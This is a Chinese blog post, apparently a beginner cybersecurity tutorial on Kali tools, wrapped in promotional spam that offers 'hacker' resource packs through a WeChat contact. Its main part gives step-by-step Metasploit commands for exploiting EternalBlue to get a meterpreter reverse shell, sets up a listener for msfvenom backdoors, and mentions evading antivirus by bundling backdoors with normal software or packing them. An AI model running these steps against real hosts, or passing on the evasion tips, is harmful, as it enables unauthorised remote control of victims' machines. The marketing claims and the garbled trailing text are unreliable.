【网络安全】-kali基本工具(1)，网络安全组件化入门

最新推荐文章于 2024-07-12 10:43:26 发布

2401_83946826

最新推荐文章于 2024-07-12 10:43:26 发布

阅读量722

点赞数 19

分类专栏： 2024年程序员学习文章标签： web安全安全

本文链接：https://blog.csdn.net/2401_83946826/article/details/137802933

版权

2024年程序员学习专栏收录该内容

274 篇文章 1 订阅

订阅专栏

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

msf（metasploit framework）是一个开源的渗透测试框架，用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具、漏洞利用模块和负载模块，可以用于发现系统中的漏洞、测试系统的安全性，并进行攻击和漏洞利用。它支持多种操作系统，包括Windows、Linux和Mac OS X。

msf使用法则：使用模块->配置模块必选项->运行模块

msfconsole		//进入msf控制台，以使用模块（推荐root权限）
>>>进入msf

//1、使用模块
search 关键词	//搜索模块
use 模块编号/绝对路径	//使用模块
>>>进入模块
//2、配置模块必选项
show options	//显示配置选项
set 选项名称 值
//3、运行模块
run

1、有此漏洞的目标主机

metasploit攻击永恒之蓝（后门）

//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷，就是攻击完成后想干啥，这里是想获取meterpreter][meterpreter相当于内部策反的间谍，提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁，既Kali的IP地址]
set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口，1-65535随便选，但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help	//从帮助里看看能对目标主机干什么

2、无此漏洞的目标主机（常用）

没有漏洞就得拍个间谍过去，把后门打开。

2.1 目标主机的间谍软件：msfvenom是用来生成后门的软件，在目标机上执行后门，在本地监听上线，更容易策反meterpreter，图中是windows，此外，还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用，不是msfconsoles终端]
在这里插入图片描述
避开杀毒软件
方法一：和正常软件捆绑

方法二：给辅助软件加壳
自行寻找

2.2 本地主机的接应程序：

use exploit/multi/handler	//攻击多目标载荷模块
set payload windows/x64/meterpreter/reverse_tcp//设置载荷
set thost 192.168.1.136
set lport 9999
run

二、nmap扫描

nmap（Network Mapper）是一个网络扫描工具，用于发现网络中的设备和主机，以及收集有关它们的信息。它可以通过发送各种网络请求和探测包来扫描目标系统，以确定其开放端口、运行的服务、操作系统类型和其他相关信息。

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

在这里插入图片描述

因篇幅有限，仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

04888 （备注网络安全）**
[外链图片转存中…(img-Hv34HRtZ-1713207941711)]

2401_83946826

关注

19
点赞
踩
12

收藏

觉得还不错? 一键收藏
0
评论
【网络安全】-kali基本工具(1)，网络安全组件化入门

用于发现网络中的设备和主机，以及收集有关它们的信息。它可以通过发送各种网络请求和探测包来扫描目标系统，以确定其开放端口、运行的服务、操作系统类型和其他相关信息。，图中是windows，此外，还能直接修改为linux、OSX的后门软件。，可以用于发现系统中的漏洞、测试系统的安全性，并进行攻击和漏洞利用。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~
复制链接

扫一扫